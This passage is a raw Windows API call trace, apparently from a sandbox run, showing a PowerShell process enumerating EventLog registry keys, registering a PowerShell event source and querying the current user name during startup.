[0080.738] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x1, lpName=0x2ba920, lpcchName=0x16d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.738] CoTaskMemFree (pv=0x2ba920)
[0080.738] CoTaskMemFree (pv=0x0)
[0080.738] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.738] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x2, lpName=0x2ba920, lpcchName=0x16d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.738] CoTaskMemFree (pv=0x2ba920)
[0080.738] CoTaskMemFree (pv=0x0)
[0080.738] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.738] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x3, lpName=0x2ba920, lpcchName=0x16d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.739] CoTaskMemFree (pv=0x2ba920)
[0080.739] CoTaskMemFree (pv=0x0)
[0080.739] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.739] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x4, lpName=0x2ba920, lpcchName=0x16d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.739] CoTaskMemFree (pv=0x2ba920)
[0080.739] CoTaskMemFree (pv=0x0)
[0080.739] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.739] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x5, lpName=0x2ba920, lpcchName=0x16d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.739] CoTaskMemFree (pv=0x2ba920)
[0080.739] CoTaskMemFree (pv=0x0)
[0080.739] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.739] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x6, lpName=0x2ba920, lpcchName=0x16d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.739] CoTaskMemFree (pv=0x2ba920)
[0080.739] CoTaskMemFree (pv=0x0)
[0080.739] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.739] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x7, lpName=0x2ba920, lpcchName=0x16d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.739] CoTaskMemFree (pv=0x2ba920)
[0080.739] CoTaskMemFree (pv=0x0)
[0080.739] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.739] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x8, lpName=0x2ba920, lpcchName=0x16d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.739] CoTaskMemFree (pv=0x2ba920)
[0080.739] CoTaskMemFree (pv=0x0)
[0080.739] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x35c) returned 0x0
[0080.739] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x0) returned 0x2
[0080.739] RegOpenKeyExW (in: hKey=0x358, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x360) returned 0x0
[0080.739] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x0) returned 0x2
[0080.739] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x364) returned 0x0
[0080.739] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x0) returned 0x2
[0080.739] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x368) returned 0x0
[0080.740] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x0) returned 0x2
[0080.740] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x36c) returned 0x0
[0080.740] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x0) returned 0x2
[0080.740] RegOpenKeyExW (in: hKey=0x358, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x370) returned 0x0
[0080.740] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x0) returned 0x2
[0080.740] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x0) returned 0x5
[0080.747] RegOpenKeyExW (in: hKey=0x358, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x374) returned 0x0
[0080.747] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x0) returned 0x2
[0080.747] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x378) returned 0x0
[0080.747] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x37c) returned 0x0
[0080.747] RegCloseKey (hKey=0x37c) returned 0x0
[0080.747] RegCloseKey (hKey=0x358) returned 0x0
[0080.747] RegCloseKey (hKey=0x378) returned 0x0
[0080.747] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d1a8 | out: phkResult=0x16d1a8*=0x378) returned 0x0
[0080.747] RegQueryInfoKeyW (in: hKey=0x378, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d11c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d118, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d11c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d118*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.747] CoTaskMemFree (pv=0x0)
[0080.747] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.747] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x0, lpName=0x2ba920, lpcchName=0x16d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.747] CoTaskMemFree (pv=0x2ba920)
[0080.747] CoTaskMemFree (pv=0x0)
[0080.747] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.747] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x1, lpName=0x2ba920, lpcchName=0x16d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.748] CoTaskMemFree (pv=0x2ba920)
[0080.748] CoTaskMemFree (pv=0x0)
[0080.748] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.748] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x2, lpName=0x2ba920, lpcchName=0x16d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.748] CoTaskMemFree (pv=0x2ba920)
[0080.748] CoTaskMemFree (pv=0x0)
[0080.748] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.748] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x3, lpName=0x2ba920, lpcchName=0x16d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.748] CoTaskMemFree (pv=0x2ba920)
[0080.748] CoTaskMemFree (pv=0x0)
[0080.748] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.748] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x4, lpName=0x2ba920, lpcchName=0x16d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.748] CoTaskMemFree (pv=0x2ba920)
[0080.748] CoTaskMemFree (pv=0x0)
[0080.748] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.748] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x5, lpName=0x2ba920, lpcchName=0x16d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.748] CoTaskMemFree (pv=0x2ba920)
[0080.748] CoTaskMemFree (pv=0x0)
[0080.748] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.748] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x6, lpName=0x2ba920, lpcchName=0x16d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.748] CoTaskMemFree (pv=0x2ba920)
[0080.748] CoTaskMemFree (pv=0x0)
[0080.748] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.748] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x7, lpName=0x2ba920, lpcchName=0x16d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.748] CoTaskMemFree (pv=0x2ba920)
[0080.748] CoTaskMemFree (pv=0x0)
[0080.748] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.748] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x8, lpName=0x2ba920, lpcchName=0x16d1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.748] CoTaskMemFree (pv=0x2ba920)
[0080.748] CoTaskMemFree (pv=0x0)
[0080.748] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x358) returned 0x0
[0080.748] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x0) returned 0x2
[0080.748] RegOpenKeyExW (in: hKey=0x378, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x37c) returned 0x0
[0080.749] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x0) returned 0x2
[0080.749] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x380) returned 0x0
[0080.749] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x0) returned 0x2
[0080.749] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x384) returned 0x0
[0080.749] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x0) returned 0x2
[0080.749] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x388) returned 0x0
[0080.749] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x0) returned 0x2
[0080.749] RegOpenKeyExW (in: hKey=0x378, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x38c) returned 0x0
[0080.749] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x0) returned 0x2
[0080.749] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x0) returned 0x5
[0080.763] RegOpenKeyExW (in: hKey=0x378, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x390) returned 0x0
[0080.763] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x0) returned 0x2
[0080.763] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x394) returned 0x0
[0080.763] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d208 | out: phkResult=0x16d208*=0x398) returned 0x0
[0080.763] RegCloseKey (hKey=0x398) returned 0x0
[0080.763] RegCloseKey (hKey=0x378) returned 0x0
[0080.764] RegCloseKey (hKey=0x394) returned 0x0
[0080.764] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d178 | out: phkResult=0x16d178*=0x394) returned 0x0
[0080.764] RegQueryInfoKeyW (in: hKey=0x394, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x16d0ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d0e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x16d0ec*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x16d0e8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.764] CoTaskMemFree (pv=0x0)
[0080.764] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.764] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x0, lpName=0x2ba920, lpcchName=0x16d178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x16d178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.764] CoTaskMemFree (pv=0x2ba920)
[0080.764] CoTaskMemFree (pv=0x0)
[0080.764] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.764] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x1, lpName=0x2ba920, lpcchName=0x16d178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x16d178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.764] CoTaskMemFree (pv=0x2ba920)
[0080.764] CoTaskMemFree (pv=0x0)
[0080.764] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.764] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x2, lpName=0x2ba920, lpcchName=0x16d178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x16d178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.764] CoTaskMemFree (pv=0x2ba920)
[0080.764] CoTaskMemFree (pv=0x0)
[0080.764] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.764] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x3, lpName=0x2ba920, lpcchName=0x16d178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x16d178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.764] CoTaskMemFree (pv=0x2ba920)
[0080.764] CoTaskMemFree (pv=0x0)
[0080.764] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.764] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x4, lpName=0x2ba920, lpcchName=0x16d178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x16d178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.764] CoTaskMemFree (pv=0x2ba920)
[0080.765] CoTaskMemFree (pv=0x0)
[0080.765] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.765] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x5, lpName=0x2ba920, lpcchName=0x16d178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x16d178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.765] CoTaskMemFree (pv=0x2ba920)
[0080.765] CoTaskMemFree (pv=0x0)
[0080.765] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.765] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x6, lpName=0x2ba920, lpcchName=0x16d178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x16d178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.765] CoTaskMemFree (pv=0x2ba920)
[0080.765] CoTaskMemFree (pv=0x0)
[0080.765] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.765] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x7, lpName=0x2ba920, lpcchName=0x16d178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x16d178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.765] CoTaskMemFree (pv=0x2ba920)
[0080.765] CoTaskMemFree (pv=0x0)
[0080.765] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.765] RegEnumKeyExW (in: hKey=0x394, dwIndex=0x8, lpName=0x2ba920, lpcchName=0x16d178, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x16d178, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0080.765] CoTaskMemFree (pv=0x2ba920)
[0080.765] CoTaskMemFree (pv=0x0)
[0080.765] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d1d8 | out: phkResult=0x16d1d8*=0x378) returned 0x0
[0080.765] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d1d8 | out: phkResult=0x16d1d8*=0x0) returned 0x2
[0080.765] RegOpenKeyExW (in: hKey=0x394, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d1d8 | out: phkResult=0x16d1d8*=0x398) returned 0x0
[0080.765] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d1d8 | out: phkResult=0x16d1d8*=0x0) returned 0x2
[0080.765] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d1d8 | out: phkResult=0x16d1d8*=0x39c) returned 0x0
[0080.765] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d1d8 | out: phkResult=0x16d1d8*=0x0) returned 0x2
[0080.765] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d1d8 | out: phkResult=0x16d1d8*=0x3a0) returned 0x0
[0080.765] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d1d8 | out: phkResult=0x16d1d8*=0x0) returned 0x2
[0080.765] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d1d8 | out: phkResult=0x16d1d8*=0x3a4) returned 0x0
[0080.765] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d1d8 | out: phkResult=0x16d1d8*=0x0) returned 0x2
[0080.766] RegOpenKeyExW (in: hKey=0x394, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d1d8 | out: phkResult=0x16d1d8*=0x3a8) returned 0x0
[0080.766] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d1d8 | out: phkResult=0x16d1d8*=0x0) returned 0x2
[0080.766] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d1d8 | out: phkResult=0x16d1d8*=0x0) returned 0x5
[0080.766] RegOpenKeyExW (in: hKey=0x394, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d1d8 | out: phkResult=0x16d1d8*=0x3ac) returned 0x0
[0080.767] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d1d8 | out: phkResult=0x16d1d8*=0x0) returned 0x2
[0080.767] RegOpenKeyExW (in: hKey=0x394, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d1d8 | out: phkResult=0x16d1d8*=0x3b0) returned 0x0
[0080.767] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d1d8 | out: phkResult=0x16d1d8*=0x3b4) returned 0x0
[0080.767] RegCloseKey (hKey=0x3b4) returned 0x0
[0080.767] RegCloseKey (hKey=0x394) returned 0x0
[0080.767] RegCloseKey (hKey=0x3b0) returned 0x0
[0080.775] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b8f0008
[0080.779] ReportEventW (hEventLog=0x1b8f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d5d278*="WSMan", lpRawData=0x3d5cfe8) returned 1
[0080.786] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0080.786] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.786] CoTaskMemFree (pv=0x256340)
[0080.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0080.787] CoTaskMemAlloc (cb=0x804) returned 0x1b8331c0
[0080.788] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8331c0, nSize=0x16d468 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x16d468) returned 0x1
[0080.788] CoTaskMemFree (pv=0x1b8331c0)
[0080.788] CoTaskMemAlloc (cb=0x204) returned 0x2ba920
[0080.788] GetUserNameW (in: lpBuffer=0x2ba920, pcbBuffer=0x16d4a8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x16d4a8) returned 1
[0080.788] CoTaskMemFree (pv=0x2ba920)
[0080.789] ReportEventW (hEventLog=0x1b8f0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3d62760*="Alias", lpRawData=0x3d624f0) returned 1
[0080.795] CoTaskMemAlloc (cb=0x104) returned 0x256340
[0080.795] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x256340, nSize=0x80 | out: lpBuffer="") returned 0x0
[0080.795] CoTaskMemFree (pv=0x256340)
[0080.795] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
